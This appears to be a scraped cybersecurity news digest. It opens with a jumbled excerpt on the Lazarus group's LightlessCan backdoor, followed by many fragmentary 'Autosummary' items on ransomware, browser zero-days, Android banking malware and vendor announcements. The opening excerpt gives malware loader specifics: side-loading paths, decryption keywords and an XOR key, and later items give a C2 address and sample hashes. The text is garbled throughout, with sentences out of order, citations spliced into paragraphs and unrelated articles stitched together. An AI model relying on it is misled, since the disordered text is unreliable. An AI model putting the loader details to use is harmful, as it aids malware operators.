PresentationHost.exe mscoree.dll NppyPluginDll (NickelLoader) C:\ProgramData\Adobe\ colorcpl.exe colorui.dll LibreSSL 2.6.5 (miniBlindingCan) C:\ProgramData\Oracle\Java\ fixmapi.exe mapistub.dll Lua plugin for Notepad++ 1.4.0.0 (LightlessCan) C:\ProgramData\Adobe\ARM\ tabcal.exe HID.dll MZC8051 for Notepad++ 3.2 (LightlessCan) LightlessCan – new backdoor The most interesting payload used in this campaign is LightlessCan, a successor of the group’s flagship HTTP(S) [12] Security Council Committee, "Sanctions Committee (DPRK), Panel of Experts, Reports," United Nations Security Council, 2010-2023.These keywords are as follows: the name of the parent process ( PresentationHost ), the internal parameter hardcoded in the binary ( 9zCnQP6o78753qg8 ), and the external parameter passed on the command line ( ‑embeddingObject ), which is inherited from the parent process of PresentationHost.exe , being provided by Quiz1.exe or Quiz2.exe . [9] Defense Intelligence Agency, North Korea military power : a growing regional and global threat, Washington, D.C.: U.S. Government Publishing Office, 2021, p. 98. To successfully decrypt the embedded data array, the dropper needs three keywords to be provided correctly: the name of the parent process ( fixmapi.exe ), the internal parameter hardcoded in the binary ( IP7pdINfE9uMz63n ), and the external parameter passed in the command line ( AudioEndpointBuilder ). As the core utilities of Windows are proprietary and not open-source, the developers of LightlessCan faced a choice: either to reverse engineer the closed-source system binaries or to get inspired by the code available via the Wine project, where many programs are rewritten in order to mimic their execution on other platforms like Linux, macOS, or ChromeOS.It is responsible for high-profile incidents such as both the Sony Pictures Entertainment hack and tens-of-millions-of-dollar cyberheists in 2016, the WannaCryptor (aka WannaCry) outbreak in 2017, the 3CX and X_TRADER supply-chain attacks, and a long history of disruptive attacks against South Korean public and critical infrastructure since at least 2011. The most significant update is mimicked functionality of many native Windows commands like ping, ipconfig, systeminfo, sc, net, etc.The diversity, number, and eccentricity in implementation of Lazarus campaigns define this group, as well as that it performs all three pillars of cybercriminal activities: cyberespionage, cybersabotage, and pursuit of financial gain. [6] P. Kálnai, "Lazarus campaigns and backdoors in 2022-2023," in Virus Bulletin International Conference, London, 2023.It uses the system information (same as the values stored in 4F59FB87DF2F) to decrypt the configuration file wlansvc.cpl and to locate, decrypt, and load the encrypted grpedit.dat, which is LightlessCan, the new full-featured RAT.As in the previous case, the lengths of the keywords are not all exactly 16 bytes, but the decryption will still work if the oversized string is truncated (for instance, to LocalServiceNetw) and the undersized string is extended with nulls (for instance, to tabcal.exe\x00\x00\x00\x00\x00\x00). The final payload is extracted and decrypted using XOR with a long key, which is a string built by concatenating the name of the parent process (colorcpl.exe), the filename of the dropper (colorui.dll), and the external command line parameter – in this case resulting in COLORCPL.EXECOLORUI.DLL669498484488D3F22712CC5BACA6B7A7.A complex chain of stages delivering the fourth payload The initial dropper of the fourth chain is a malicious dynamically linked library HID.dll that is side-loaded by a legitimate executable, tabcal.exe, executed from C:\ProgramData\Adobe\ARM\. The DLL is a trojanized version of MZC8051.dll, a legitimate file from the 8051 C compiler plugin project for Notepad++. The most worrying aspect of the attack is the new type of payload, LightlessCan, a complex and possibly evolving tool that exhibits a high level of sophistication in its design and operation, representing a significant advancement in malicious capabilities compared to its predecessor, BlindingCan.Infrastructure: For the first-level C&C servers (listed in the Network section at the end of this blogpost), the attackers do not set up their own servers, but compromise existing ones, usually those having poor security and that host sites with neglected maintenance.There’s an encrypted data array in the DLL’s dumped body, together with multiple debug symbols revealing the root directory and the project from which it was built: W:\Develop\aTool\ShellCodeLoader\App\libressl-2.6.5\ As the name ShellCodeLoader suggests, the main purpose of this initial stage is to decrypt and load the data array from its body, which contains shellcode.LightlessCan is a new complex RAT that has support for up to 68 distinct commands, indexed in a custom function table, but in the current version, 1.0, only 43 of those commands are implemented with some functionality. [4] Positive Technologies Expert Security Center, "Lazarus Group Recruitment: Threat Hunters vs Head Hunters," Positive Technologies, 27 April 2021. [17] S. Tomonaga, "Windows Commands Abused by Attackers," JPCERT/CC, 26 January 2016. [11] ESET Editor, "WannaCryptor aka WannaCry: Key questions answered," WeLiveSecurity.com, 15 May 2017.Hardcoded strings revealing the (partial) schtasks functionality Furthermore, an examination of the RAT’s internal configuration suggests that, in comparison to BlindingCan, Lazarus increased the code sophistication in LightlessCan. "One in every six ransomware attacks targeting US government offices was traced back to the LockBit ransomware group, according to Trend Micro. Overall ransomware attack victim numbers increased by 47% from H2 2022. “We’ve observed a significant increase in the number of ransomware victims since the second half of 2022. Threat actors continue to innovate, target more victims, and cause significant financial and reputational damage. Organizations of all sizes must prioritize and enhance their cybersecurity … More
The post Ransomware groups are shifting their focus away from larger targets appeared first on Help Net Security.
"Autosummary:
LockBit, the top ransomware family since 2022, accounted for 26.09% of total victim organizations, with BlackCat and Clop responsible for 10.59% and 10.09% of attacks, respectively. "Autosummary:
"In this Help Net Security interview, Raffaele Mautone, CEO of Judy Security, talks about the cybersecurity problems that small businesses face and the need for prioritization to save businesses from potential fines and damage to their brand reputation. He also discusses trends and steps small businesses can take to protect themselves, even with an insufficient cybersecurity budget. One of the primary reasons small business owners cite for not investing in cybersecurity is the expense involved. … More
The post The hidden costs of neglecting cybersecurity for small businesses appeared first on Help Net Security.
"Autosummary:
Additionally, employees should be well-versed in proper data handling, including encryption and secure file sharing practices, and should be educated on device security, including keeping devices updated with security patches and using secure networks.In this Help Net Security interview, Raffaele Mautone, CEO of Judy Security, talks about the cybersecurity problems that small businesses face and the need for prioritization to save businesses from potential fines and damage to their brand reputation. "Google has fixed another critical zero-day vulnerability (CVE-2023-5217) in Chrome that is being exploited in the wild. About CVE-2023-5217 The vulnerability is caused by a heap buffer overflow in vp8 encoding in libvpx – a video codec library from Google and the Alliance for Open Media (AOMedia). Heap buffer overflows can cause program crashes or arbitrary code execution. CVE-2023-5217 has been fixed in Google Chrome 117.0.5938.132 for Windows, Mac and Linux users. Google noted that … More
The post Yet another Chrome zero-day exploited in the wild! (CVE-2023-5217) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Budworm, also referred to by the names APT27, Bronze Union, Emissary Panda, Iron Tiger, Lucky Mouse, and Red Phoenix, is known to be active since at least 2013, targeting a wide range of industry verticals in pursuit of its intelligence gathering goals. "Google released security updates to address a new actively exploited zero-day vulnerability, tracked as CVE-2023-5217, in the Chrome browser. Google on Wednesday released security updates to address a new actively exploited zero-day flaw in the Chrome browser which is tracked as CVE-2023-5217. The CVE-2023-5217 is a high-severity heap buffer overflow that affects vp8 encoding in […]
The post GOOGLE FIXED THE FIFTH CHROME ZERO-DAY OF 2023 appeared first on Security Affairs.
"Autosummary:
This is the fifth actively exploited zero-day vulnerability in Chrome addressed by Google this year, the other ones are: CVE-2023-2033 (CVSS score: 8.8) – Type Confusion in V8 (CVSS score: 8.8) – Type Confusion in V8 CVE-2023-2136 (CVSS score: 9.6) – Integer overflow in the Skia graphics library (CVSS score: 9.6) – Integer overflow in the Skia graphics library CVE-2023-3079 (CVSS score: 8.8) – Type Confusion in V8 (CVSS score: 8.8) – Type Confusion in V8 CVE-2023-4863 (CVSS score: 8.8) – "Autosummary:
"Autosummary:
He was, however, served a subpoena issued by the Southern District of New York demanding his appearance at the court for testimony: Subpoena issued by SDNY to Sam Curry "After they"d questioned me, I was asked to leave the room while they sat and searched through my unlocked device for another hour," the researcher shared on X (Twitter) in a thread that has now been deleted. "At this point I"d been given almost no information on whether or not I was a subject, witness, or anything related to the case at all." "Once they were finished, I was told that I could leave and immediately contacted a lawyer. "Autosummary:
The SysUpdate malware is a remote access trojan (RAT) associated with Budworm (aka APT27 or Emissary Panda) since 2020, supporting Windows service, process, and file management, command execution, data retrieval, and screenshot capturing. "Autosummary:
My hunch is that the Dark Angels group were being rather optimistic when in their extortion message to Johnson Controls they insisted that "co-operating with the FBI, CISA, and so on and involving their officers in negotiations" was "strictly forbidden" and would result in them ending negotiations and result in all of the leaked data being published for free. "Norton announced Norton Small Business, the all-in-one cybersecurity solution to help entrepreneurs and small business owners protect their financial futures. While nearly 90% of businesses globally are small businesses – 99.9% in the US – many lack the means to protect their digital environments. Norton Small Business makes triple-lock protection accessible for small businesses to safeguard their team’s online activities, devices and customer data in an easy, all-in-one cybersecurity solution. “Owning a very small business … More
The post Norton Small Business offers protection against scams and phishing threats appeared first on Help Net Security.
"Autosummary:
Setting up your one-person IT department Norton is your go-to partner to make small business cybersecurity simple with an all-in-one solution that provides 24/7 cybersecurity protection and a variety of features, including: Secure Browser, Password Manager and VPN (virtual private network) to help secure day-to-day online activities Automated PC cleaning and optimization to keep healthier PCs for longer Secure Cloud Backup for PCs to help reduce the risk of loss of business data Software and driver updaters to help keep software up to date, so there are fewer vulnerabilities for cybercriminals to exploit IT coverage and maintenance for up to 20 devices IT coverage and maintenance for up to 20 devices A 100% Virus Protection Promise “We’ve built our small business products and services with the same approach in mind as we do with our consumer portfolio, so entrepreneurs don’t need to worry about becoming cybersecurity experts,” said Rapparini. "Autosummary:
It has since been attributed to a wide range of backdoors such as BendyBear, BIFROSE (aka Bifrost), Consock, KIVARS, PLEAD, TSCookie (aka FakeDead), XBOW, and Waterbear (aka DBGPRINT). "Johnson Controls International suffered a ransomware attack that impacted the operations of the company and its subsidiaries. Johnson Controls International plc is a multinational conglomerate with a diversified portfolio of products and services primarily focused on building technologies and solutions. The company provides HVAC (heating, ventilation, and air conditioning), solutions for building automation, fire and […]
The post Dark Angels Team ransomware group hit Johnson Controls appeared first on Security Affairs.
"Autosummary:
Dark Angels Team created a new variant of their linux ransomware to target @johnsoncontrols. new sample: fe8b6b7c3c86df0ee47a3cb04a68891fd5e91f3bfb13482112dd9042e8baebdf old sample: 3b56cea72e8140a7044336933cf382d98dd95c732e5937a0a61e0e7296762c7b pic.twitter.com/veAgLH8Ptf — Gameel Ali 🤘 (@MalGamy12) September 27, 2023 According to BleepingComputer, the ransomware group is demanding $51 million to provide a decryptor, the amount of the ransom was confirmed by Malware Hunter Team researchers: Dark Angels" base ransom amount for Johnson Controls is $51 million. "Autosummary:
Malicious ads created by the threat actor Source: Malwarebytes Clicking on the malicious ad for the IP scanner takes users to a website ("mynetfoldersip[.]cfd") that separates bots and crawlers from human victims by checking IP address, timezone, and various system indicators for sandbox/virtual machines. "Autosummary:
" 48 hours between ransomware attacks In contrast to the past, when ransomware groups typically required a minimum of 10 days to execute such attacks, now the vast majority of ransomware incidents targeting the same victim take place within a mere 48-hour timeframe of each other, according to FBI"s data. "Cisco released security updates for an actively exploited zero-day flaw (CVE-2023-20109) that resides in the GET VPN feature of IOS and IOS XE software. Cisco warned customers to install security updates to address an actively exploited zero-day vulnerability, tracked as CVE-2023-20109 (CVS 6.6), that resides in IOS and IOS XE software. The vulnerability resides in […]
The post Cisco urges to patch actively exploited IOS zero-day CVE-2023-20109 appeared first on Security Affairs.
"Autosummary:
Cisco confirmed that this vulnerability does not affect the following products: IOS XR Software Meraki products NX-OS Software Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CVE-2023-20109) "Autosummary:
Clop has been linked to multiple high-impact data theft and extortion campaigns targeting other managed file transfer platforms, including Accellion FTA servers in December 2020, the 2021 SolarWinds Serv-U Managed File Transfer attacks, and the mass exploitation of a GoAnywhere MFT zero-day in January 2023. "Autosummary:
During a recent Senate staff briefing, U.S. State Department officials disclosed that the attackers stole at least 60,000 emails from Outlook accounts belonging to State Department officials stationed in East Asia, the Pacific, and Europe, as Reuters first reported. "Autosummary:
"Autosummary:
The flaws are believed to have been put to use alongside three other flaws – CVE-2022-4262, CVE-2022-3038, CVE-2022-22706 – by a customer or partner of a Spanish spyware company known as Variston IT. "Appdome announced new mobile anti-malware protections that detect Android Accessibility Service Malware such as Xenomorph, Brasdex, Octo, Sharkbot, Flubot, TeaBot, PixPirate, Sova, Spynote, Joker and more. These malware are used to carry out large scale, distributed attacks on mobile banking apps, crypto wallets, and other financial services apps. Accessibility Service is the Android framework designed to allow mobile applications for individuals who are disabled to interact with all applications on an Android device. Unfortunately, Accessibility … More
The post Appdome unveils mobile anti-malware protections appeared first on Help Net Security.
"Autosummary:
Appdome announced new mobile anti-malware protections that detect Android Accessibility Service Malware such as Xenomorph, Brasdex, Octo, Sharkbot, Flubot, TeaBot, PixPirate, Sova, Spynote, Joker and more. "The Chrome zero-day exploited in the wild and patched by Google a few weeks ago has a new ID (CVE-2023-5129) and a description that tells the whole story: the vulnerability is not in Chrome, but the libwebp library, which is used by many popular applications for encoding/decoding the WebP image format. About CVE-2023-5129 The source of the vulnerability is a flawed implementation of the Huffman coding algorithm, which may allow attackers to trigger a heap … More
The post Google “confirms” that exploited Chrome zero-day is actually in libwebp (CVE-2023-5129) appeared first on Help Net Security.
"Autosummary:
Rezilion’s Ofri Ouzan and Yotam Perkal pointed out that the libwebp library can be found in: Popular container images, “collectively downloaded and deployed billions of times” (e.g., drupal, ngnix, perl, python, ruby, rust, wordpress) A variety of utilities that depend on libwebp The most popular web browers (Chrome, Firefox, Microsoft Edge, Opera, etc. "Autosummary:
ZenRAT, once launched, gathers details about the host, including CPU name, GPU name, operating system version, browser credentials, and installed applications and security software, to a command-and-control (C2) server (185.186.72[.]14) operated by the threat actors. "Following the recently announced data leak from Sony, Ransomed.vc group claimed the hack of the Japanese giant NTT Docomo. Following the recently announced data leak from Sony, the notorious ransomware syndicate Ransomed.vc announced a new victim today in face of the largest Japanese telecommunication giant NTT Docomo. Notably, the announcement came almost synchronously with the […]
The post ‘Ransomed.vc’ in the Spotlight – What is Known About the Ransomware Group Targeting Sony and NTT Docomo appeared first on Security Affairs.
"Autosummary:
Resecurity uncovered interesting connections to independent hacktivist groups which later united in alliances like “Five Families”, a coalition of several groups (STORMOUS, GhostSec, SigedSec, ThreatSec) previously responsible for large-scale cybersecurity incidents. "Autosummary:
"SeeMetrics launched its latest innovation: Customizable Cybersecurity Performance Boards. This product launch marks a significant milestone as it allows security leaders to communicate their desired narrative to different stakeholders and in the context that matters most to them. This customization comes in two essential dimensions: Security leaders can now instantaneously create their own Cybersecurity Performance Boards, selecting from a library of ready-to-use metrics that align with their specific needs and goals. Secondly, the customization extends … More
The post SeeMetrics releases customizable Cybersecurity Performance Boards appeared first on Help Net Security.
"Autosummary:
Secondly, the customization extends to the metrics level as well, allowing leaders to set thresholds, filter business units, timeframes, asset types, geographic considerations and more in a dynamic way. "Cybercriminals are leveraging the ZeroFont technique to trick users into trusting phishing emails, SANS ISC handler Jan Kopriva has warned. The ZeroFont phishing attack Documented and named by Avanan in 2018, the ZeroFont technique involves using text written in font size “0” throughout the email body. In that campaign, it was used to bypass Microsoft’s NLP-based anti-phishing protections by breaking up the text strings that would otherwise trigger them. A new purpose Email clients generally … More
The post New twist on ZeroFont phishing technique spotted in the wild appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Supercharge Your Skills This, in turn, is rooted in the fact that some web standards allow for the framing page to apply visual effects (i.e., SVG filters) to the iframed page, thereby exposing the mechanism to side-channel attacks by, say, computing the time differences between rendering black and white pixels and then distinguish between them using the timing information. "Autosummary:
The company employs 100,000 people through its corporate operations and subsidiaries, including York, Tyco, Luxaire, Coleman, Ruskin, Grinnel, and Simplex. "Autosummary:
While first marking it as a Chrome flaw, the company later assigned another CVE (CVE-2023-5129) and a maximum 10/10 severity rating, tagging it as a critical security vulnerability in libwebp (a library used by a large number of projects, including Signal, 1Password, Mozilla Firefox, Microsoft Edge, Apple"s Safari, and the native Android web browser). "Autosummary:
Stealing data, evading analysis Once running, ZenRAT uses WMI queries and other system tools to collect data about the host, which includes: CPU Name GPU Name OS Version Installed RAM IP address and Gateway Installed Antivirus Installed Applications The details above are delivered to the command and control (C2) server in a ZIP archive that also includes data and credentials collected from the web browser. "Categories: Android Categories: Apple Categories: Exploits and vulnerabilities Tags: Pegasus Tags: spyware Tags: nso Tags: webp Tags: libwebp Tags: buffer overflow The company behind the infamous Pegasus spyware used a vulnerability in almost every browser to plant their malware on victim"s devices. |
The post Pegasus spyware and how it exploited a WebP vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
Our own David Ruiz wrote: “Pegasus is reportedly instrumental to several governments’ oppressive surveillance campaigns against their own citizens and residents, and, while NSO Group has repeatedly denied allegations that it complicitly sells Pegasus to human right abusers, it is difficult to reconcile exactly how the zero-click spyware program—which non-consensually and invisibly steals emails, text messages, photos, videos, locations, passwords, and social media activity—is at the same time a tool that can, in its very use, respect the rights of those around the world to speak freely, associate safely, and live privately.” Both of the vulnerabilities, CVE-2023-41064 and CVE-2023-4863 were based on a heap buffer overflow in Libwebp, the code library used to encode and decode images in the WebP format. On September 12, 2023 we published two blogs urging our readers to urgently patch two Apple issues which were added to the catalog of known exploited vulnerabilities by the Cybersecurity & Infrastructure Security Agency (CISA), and to apply an update for Chrome that included one critical security fix for an actively exploited vulnerability. "Categories: Business Customers rated Malwarebytes MDR as “Easiest to do Business With,” “Best Est. ROI,” “Easiest to Use,” and “Easiest Admin, and more. |
The post Malwarebytes MDR wins G2 awards for "Best ROI," "Easiest to Use," and more appeared first on Malwarebytes Labs.
"Autosummary:
Dennis Davis, IT Systems Manager Experience Malwarebytes MDR: Award-winning ROI, user-friendly, and effective threat defense Malwarebytes MDR provides IT staff with award-winning business protection, offering 24x7 alert monitoring and guidance, active remediation, and threat hunting across endpoints. "Categories: Business We released version 1.2 of the Malwarebytes Admin app for IOS and Android last week, featuring new Detections features that adds visibility into threats. |
The post Malwarebytes Admin update: New Detection screens to manage threats! appeared first on Malwarebytes Labs.
"Autosummary:
For each item in detections list, admins can see: Threat Name Action Taken Category (Malware, PUP, etc) Endpoint Name Administrators are also able to filter detections by Endpoint Name, Threat Name, Action Taken, Category, and more. "A Russian zero-day broker is willing to pay $20 million for zero-day exploits for iPhones and Android mobile devices. The Russian zero-day broker firm Operation Zero is increasing payouts for top-tier mobile exploits. The company is willing to pay up to $20,000,000 for zero-day exploits for iPhone and Android devices. The Russian company pointed out […]
The post Russian zero-day broker is willing to pay $20M for zero-day exploits for iPhones and Android devices appeared first on Security Affairs.
"Autosummary:
Russian zero-day broker is willing to pay $20M for zero-day exploits for iPhones and Android devices Pierluigi Paganini September 27, 2023 September 27, 2023 A Russian zero-day broker is willing to pay $20 million for zero-day exploits for iPhones and Android mobile devices. "Autosummary:
Conclusion Obviously there are other programming languages that are widely used in cybersecurity, such as C and C++, Java, Bash, Go, and Ruby, but those will be topics for future blogposts. "The risk of falling victim to fraud is a constant concern for individuals, businesses, and organizations alike. As technology evolves, so too do the methods employed by fraudsters, making fraud prevention an increasingly critical and complex endeavor. In this Help Net Security round-up, we bring insights from cybersecurity experts who shed light on crucial aspects of fraud prevention. Complete videos David Fletcher, SVP at ClearSale, discusses how an effective fraud prevention strategy can force fraudsters … More
The post Fraud prevention forces scammers to up their game appeared first on Help Net Security.
"Autosummary:
"Vulnerability scanners delve into systems to uncover security gaps. The primary mission? To fortify organizations against breaches and shield sensitive data from exposure. Beyond merely pinpointing weaknesses, vulnerability scanning is a proactive measure to anticipate potential attacker entry points. The essence of this process lies not just in detection but in remediation and refining strategies, ensuring that vulnerabilities are prioritized. Here’s a list of 5 free, open-source vulnerability scanners you can try today. Nuclei Nuclei … More
The post 5 free vulnerability scanners you should check out appeared first on Help Net Security.
"Autosummary:
Cariddi Cariddi enables you to take a list of domains, crawl URLs, and scan for endpoints, secrets, API keys, file extensions, tokens, and more. "MITRE ATT&CK, a common language for cybersecurity professionals to communicate with each other and better understand real-world adversary behaviors, celebrates its 10th anniversary this fall. In this Help Net Security interview, project leader Adam Pennington discusses the framework, how defenders can best use it, and what’s next. What were the main drivers behind the creation of the MITRE ATT&CK framework back in 2013? The framework was born out of an internal exercise performed at MITRE’s … More
The post MITRE ATT&CK project leader on why the framework remains vital for cybersecurity pros appeared first on Help Net Security.
"Autosummary:
In the last five years, we’ve expanded the core framework with ATT&CK for industrial control systems, mobile, Linux, various cloud platforms (Office 365, Azure, etc.), network devices (computer switches and routers), and more. Additionally, we monitor social media, public reports from various government entities, and updates from incident response firms.In 2018, we amassed enough interest to launch ATT&CKcon (the fourth iteration of the user conference will run Oct. 24-25 at MITRE’s McLean, Va., headquarters). "The surge in digital economic growth and our increasing dependence on it make cybersecurity a critical profession. In this Help Net Security video, Aaron Rosenmund, Director of Security Research and Curriculum, Pluralsight, discusses the most sought-after cybersecurity skills in today’s competitive labor market. Download: Ultimate guide to Certified in Cybersecurity
The post Cybersecurity skills employers are desperate to find in 2023 appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Group-IB analysts working together with Bridewell and independent researcher Michael Koczwara attribute with various degrees of confidence ShadowSyndicate"s use of the Quantum, Nokoyawa, BlackCat/ALPHV, Clop, Royal, Cactus, and Play ransomware in multiple breaches observed since July 2022. "Stratascale, an SHI company, announced the acquisition of Vector0, an Attack Surface Management (ASM) provider. Through the acquisition, Stratascale professionals and their customers gain visibility of attack vectors and points of vulnerability, enhancing Stratascale’s ability to deliver proactive cybersecurity services. “Vector0 enables us to offer a comprehensive and proactive approach to Attack Surface Validation (ASV), giving organizations the tools they need to secure their digital initiatives effectively,” said David Olzak, Senior Vice President at Stratascale. … More
The post Stratascale acquires Vector0 to strengthen its cybersecurity services appeared first on Help Net Security.
"Autosummary:
"Autosummary:
When analyzing corresponding Autonomous Systems (AS) of NLX IP addresses, Akamai Connected Cloud (formerly Linode) accounted for the largest portion of NLX traffic (16%), followed by Amazon (15%), M247 Europe SRL (9%), DigitalOcean (6%) and Scaleway (5%)**.4: NLX Traffic by Industry Furthermore, nearly one-third (32%) of attacks analyzed in the NLX data were Traversal; while SQL Injection (SQLI) accounted for 28%, Cross Site Scripting (XSS) at 20%, OS Command Injection (CMDEXE) at 13%, and Log4j JNDI lookups (LOG4J-JNDI) at 7%. Before diving deeper into the attack observations, here are five key takeaways that we found most significant in our research, covering global traffic across multiple industries, including High Tech, Financial Services, Commerce, Education, and Media and entertainment.How To Use This Report Enhance situational awareness of techniques used by threat actors Identify potential attacks targeting your industry Gain insights to help improve and accelerate your organization"s threat response Summary of Findings The Network Effect Threat Report offers insights based on unique data from Fastly"s Next-Gen WAF from Q2 2023 (April 1, 2023 to June 30, 2023). Out-of-Band (OOB) Callbacks: Callback server domains are prevalent throughout NLX data, particularly in Log4j JNDI lookups, OS command injection, and Cross-Site Scripting (XSS) attacks. Observations During the Reporting Period, more than half (54%) of all attacks observed were tagged with NLX and the majority of IP addresses in NLX data were not focused on a single customer or industry but spread across multiple targets: 69% of IP addresses targeted multiple customers (Figure 2), and 64% targeted multiple industries. "A new campaign is spreading Xenomorph malware to Android users in the United States, Spain, Portugal, Italy, Canada, and Belgium. Researchers from ThreatFabric uncovered a new campaign spreading Xenomorph malware to Android users in the United States and all over the world. In February 2022, researchers from ThreatFabric first spotted the Xenomorph malware, which was distributed via the official Google Play […]
The post Xenomorph malware is back after months of hiatus and expands the list of targets appeared first on Security Affairs.
"Autosummary:
The new variant supports a new automated transfer system (ATS) framework and can target over 400 banks and financial institutions mainly from Spain, Turkey, Poland, the United States, Australia, Canada, Italy, Portugal, France, Germany, UAE, and India.Xenomorph malware is back after months of hiatus and expands the list of targets Pierluigi Paganini September 26, 2023 September 26, 2023 A new campaign is spreading Xenomorph malware to Android users in the United States, Spain, Portugal, Italy, Canada, and Belgium. "Resecurity research found that the ‘Smishing Triad’ cybercrime group has expanded its phishing campaign into the United Arab Emirates (UAE). Resecurity research recently found that ‘Smishing Triad,’ a group specializing in phishing scams conducted via SMS (smishing attacks), has expanded its attack campaign into the United Arab Emirates (UAE). First identified by Resecurity in August, […]
The post Smishing Triad Stretches Its Tentacles into the United Arab Emirates appeared first on Security Affairs.
"Autosummary:
First identified by Resecurity in August, the group was initially observed targeting victims in the U.S., UK, Poland, Sweden, Italy, Indonesia, Japan, and other countries. "Autosummary:
Moreover, AtlasAgent supports the following commands: Obtain computer system information Reverse Shell Obtain data from CnC and store it in the specified file Debugging field Pause the program for a period of time using the Sleep function Obtain process information Inject shellcode into a new thread of the specified process Parameter function is to be implemented. "Autosummary:
Although Openfire fixed the issue with versions 4.6.8, 4.7.5, and 4.8.0, released in May 2023, VulnCheck reported that by mid-August 2023, over 3,000 Openfire servers were still running a vulnerable version. "Software development firm JetBrains has fixed a critical vulnerability (CVE-2023-42793) in its TeamCity continuous integration and continuous delivery (CI/CD) solution, which may allow authenticated attackers to achieve remote code execution and gain control of the server. “As of September 25, 2023, Rapid7 is not aware of in-the-wild exploitation of CVE-2023-42793, and no public exploit code is available,” shared Caitlin Condon, head of vulnerability research at Rapid7. About CVE-2023-42793 CVE-2023-42793 is an authentication bypass vulnerability that … More
The post Critical JetBrains TeamCity vulnerability could be exploited to launch supply chain attacks (CVE-2023-42793) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Intruder provides actionable, audit ready reports, so you can easily show your security posture to auditors, stakeholders and customers PCI DSS The PCI DSS (Data Security Standard) was developed by the PCI Security Standards Council and the major card brands (American Express, Mastercard and Visa) to regulate anyone that stores, processes, and/or transmits cardholder data. ISO 27001 ISO produces a set of voluntary standards for a variety of industries – ISO 27001 is the standard for best practice in an ISMS (information security management system) to manage the security of financial information, intellectual property, personnel information, and other third-party information. Security basics like risk assessments, encrypted data storage, vulnerability management and incident response plans are fairly common across standards, but what systems and operations must be secured, and how, are specific to each standard. Compliance doesn"t have to mean complexity Compliance can seem like a labour-intensive and expensive exercise, but it can pale in comparison to the cost of fixing a breach, paying settlements to customers, losing your reputation, or paying fines. SOC 2 SaaS and born-in-the-cloud businesses that provide digital services and systems will be most familiar with SOC 2 as it covers the storage, handling and transmission of digital data, although certification is becoming increasingly popular with all service providers. "Autosummary:
In other words, the ATS framework makes it possible to automatically extract credentials, access account balance information, initiate transactions, obtain MFA tokens from authenticator apps, and perform fund transfers, all without the need for any human intervention. "This week the Rhysida ransomware group claimed the hack of the Kuwait Ministry of Finance and added it to its Tor leak site. Last week a ransomware attack hit the Government of Kuwait, the attack took place on September 18 and the government experts immediately started the incident response procedures to block the threat. Below […]
The post The Rhysida ransomware group hit the Kuwait Ministry of Finance appeared first on Security Affairs.
"Autosummary:
تصريح صحفي:تحديث بشأن التحقيقات الجارية في عملية الهجمة السيبرانية المحدودة التي تمت في 18 سبتمبر وأصابت أحد أنظمة الوزارة: – جميع البيانات الخاصة برواتب العاملين في الجهات الحكومية لا تخزن في أنظمة الوزارة – العمل مع شركة عالمية متخصصة في مكافحة هذا النوع من الجرائم المعلوماتية pic.twitter.com/SaK4NGwoYB — وزارة المالية-الكويت (@MOFKW) September 25, 2023 This week the Rhysida ransomware group claimed responsibility for the attack and added the ministry to the list of victims on its Tor leak site. "The Better Outcomes Registry & Network (BORN), the Ontario birth registry disclosed a data breach affecting some 3.4 million people. The Better Outcomes Registry & Network (BORN) is a program and database used in the healthcare sector, particularly in maternal and child health, to collect, manage, and analyze health information for the purpose of improving […]
The post BORN Ontario data breach impacted 3.4 million newborns and pregnancy care patients appeared first on Security Affairs.
"Autosummary:
The exposed data includes: Full name Home address Postal code Date of birth Health card number Depending on the type of care received by the impacted individuals, the following data may have been exposed: Dates of service/care, Lab test results, Pregnancy risk factors, Type of birth, Procedures, Pregnancy and birth outcomes At this time, the organization is not aware of any data that is copied that has been misused for any fraudulent purposes. "Autosummary:
"Autosummary:
"Autosummary:
A majority of the servers (23) are located in Panama, followed by Cyprus (11), Russia (9), Seychelles (8), Costa Rica (7), Czechia (7), Belize (6), Bulgaria (3), Honduras (3), and the Netherlands (3). The actor, active since July 16, 2022, has linked to ransomware activity related to Quantum, Nokoyawa, BlackCat, Royal, Cl0p, Cactus, and Play strains, while also deploying off-the-shelf post-exploitation tools like Cobalt Strike and Sliver as well as loaders such as IcedID and Matanbuchus. "Autosummary:
"Autosummary:
The threat actor states that the dump contains: "A lot of credentials for internal systems," and files related to: SonarQube Creators Cloud Sony"s certificates A device emulator for generating licenses qasop security Incident response policies and more. "Categories: Business How can organizations stay secure amidst the ceaseless tide of change? |
The post Webinar: Bridging digital transformation & cybersecurity appeared first on Malwarebytes Labs.
"Autosummary:
Meet the Experts Marcin Kleczynski , CEO of Malwarebytes, teams up with , CEO of Malwarebytes, teams up with Chris Brock, Drummond"s Chief Information Officer. "Autosummary:
"Despite some positive developments, the impact of ransomware attacks remains high, according to SpyCloud. Infostealer infections preceded 22% of ransomware events for North American and European ransomware victim companies in 2023 – with common infostealers such as Raccoon, Vidar, and Redline increasing the probability even further. SpyCloud’s analysis shows that 76% of infections that preceded these ransomware events involved Raccoon infostealer malware. Ransomware is a malware problem at its core Despite shifting priorities to better … More
The post Current ransomware defenses efforts are not working appeared first on Help Net Security.
"Autosummary:
“Ransomware is a malware problem at its core, and there’s a clear pattern emerging that shows infostealer malware is directly leading to ransomware attacks,” said Trevor Hilligoss, Senior Director of Security Research at SpyCloud. "Security processes are increasingly automated which has led some businesses to deprioritize developing their security teams’ defense skills. While antivirus and non-human generated threat detections efficiently identify vulnerabilities, they cannot detect every single threat. With the rising number of cyber-attacks, organizations must make sure they are ready to defend themselves. That means equipping cybersecurity teams with sufficient skills to identify and effectively stop an attack in its tracks. Worryingly, only 17% of tech workers are … More
The post Hands-on threat simulations: empower cybersecurity teams to confidently combat threats appeared first on Help Net Security.
"Autosummary:
